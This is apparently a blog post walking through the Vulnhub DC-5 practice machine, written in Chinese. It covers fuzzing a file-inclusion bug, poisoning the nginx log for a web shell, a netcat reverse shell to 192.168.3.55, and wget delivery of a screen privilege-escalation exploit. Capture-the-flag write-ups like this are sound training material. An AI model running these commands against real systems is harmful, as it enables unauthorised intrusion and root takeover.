

r0ckyzzz's Blog.

Vulnhub靶机DC-5通关笔记

r0ckyzzz's Blog.

Vulnhub靶机DC-5通关笔记

Vulnhub

Word count: 507Reading time: 2 min

 2020/03/10   Share

• 
• 
• 
• 
• 

Vulnhub靶机DC-5通关笔记

¶前言

下载地址：https://www.vulnhub.com/entry/dc-5,314/

¶开始

起手nmap扫描

开放了80和111端口

80端口是很简单的页面
交互的只有
thankyou.php

接着看111端口的rpc服务

都是拒绝服务的漏洞 没有什么实质的帮助

那怎么搞啊

记住做vulnhub的靶机 有一个很重要的经验就是要看下载页面的提示，虽然是英文但是可以少走很多弯路

You need to look for something a little out of the ordinary (something that changes with a refresh of a page).
在一个随着刷新会改变的页面寻找与原来不同的东西

注意到Copyright后面的数字会随着刷新的改变而改变，所以这里就是这道题的关键了

要fuzz一下

fuzz出来的结果是file=xxxx进行包含

既然可以包含那就可以包含nginx文件来getshell了

然后包含
/var/log/nginx/access.log
放入蚁剑 连接成功

反弹shell
nc -e /bin/bash 192.168.3.55 77

拿个bash好操作

python -c 'import pty;pty.spawn("/bin/bash")'

接下来的目的就是提权

sudo -l执行不了

看看SUID

find / -perm /4000 2>/dev/null

screen这个是我接触过的
用来管理多重视窗的

这个可以用来提权吗？
查一下

找到一个版本对应的本地权限提升的exp

看看具体的用法

看着exp的用法弄好

python -m SimpleHTTPServer

开启http的服务
然后用wget把我们的exp传入靶机的tmp目录

wget http://192.168.3.55:8000/libhax.so

wget http://192.168.3.55:8000/rootshell

然后跟着后面的操作

最终拿到flag

¶总结

这个靶机是做过最难的靶机 主要是因为fuzz的部分没想到 没想到藏着一个文件包含的漏洞，只要弄通了这一点后面的好解决了，但渗透的艺术就在于fuzz出一些隐藏的关键点从而攻破整个系统

Author：r0ckyzzz

原文链接：http://r0cky.xyz/2020/03/10/Vulnhub%E9%9D%B6%E6%9C%BADC-5%E9%80%9A%E5%85%B3%E7%AC%94%E8%AE%B0/

发表日期：March 10th 2020, 11:36:00 pm

更新日期：March 13th 2020, 4:42:57 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Vulnhub靶机DC-6通关笔记
• Previous Post
  Vulnhub靶机DC-4通关笔记

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. Vulnhub靶机DC-5通关笔记
   1. 1.1. ¶前言
   2. 1.2. ¶开始
   3. 1.3. ¶总结



• Archive
• Tag
• Cate

Total : 37

2021

• 08/02利用captcha_trainer进行验证码识别

2020

• 04/04HTB靶机Jeeves通关笔记
• 04/03HTB靶机Shocker、Blue、Bank通关笔记
• 04/02HTB靶机Lame、Leagcy、Bashed、Popcorn通关笔记
• 03/27Vulnhub靶机LiterallyVulnerable通关笔记
• 03/26Vulnhub靶机SickOS1.1通关笔记
• 03/25# Vulnhub靶机SkyTower通关笔记
• 03/24Vulnhub靶机VulnOS2通关笔记
• 03/24Vulnhub靶机pwnlab_init通关笔记
• 03/23Vulnhub靶机Stapler通关笔记
• 03/22Vulnhub靶机FristiLeaks_1.3通关笔记
• 03/21Vulnhub靶机DeRPnStiNK通关笔记
• 03/21Vulnhub靶机LordOfTheRoot_1.0.1通关笔记
• 03/20Vulnhub靶机W1r3s通关笔记
• 03/19Vulnhub靶机Tr0ll:1通关笔记
• 03/19Vulnhub靶机Wintermute通关笔记
• 03/18Vulnhub靶机Raven2通关笔记
• 03/17Vulnhub靶机Raven1通关笔记
• 03/17Vulnhub靶机Lampiao通关笔记
• 03/16Vulnhub靶机GoldenEye通关笔记
• 03/15Vulnhub靶机DC-9通关笔记
• 03/15Vulnhub靶机DC-8通关笔记
• 03/14Vulnhub靶机DC-7通关笔记
• 03/13Vulnhub靶机DC-6通关笔记
• 03/10Vulnhub靶机DC-5通关笔记
• 03/10Vulnhub靶机DC-4通关笔记
• 03/08Vulnhub靶机DC-3通关笔记
• 03/06Vulnhub靶机DC-2通关笔记
• 03/05Vulnhub靶机DC-1通关笔记
• 02/22局域网DNS劫持
• 02/22Wifi-pumpkin
• 02/22攻防世界Web进阶区部分writeup
• 02/22攻防世界Web进阶区部分writeup 2
• 02/22CISCN Web love_math
• 02/22CVE-2018-4878复现
• 02/22CISCN Web1 Justsoso
• 02/22免杀相关

Security security ctf vulnhub Vulnhub OSCP vulhub Linux环境变量 HTB htb



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

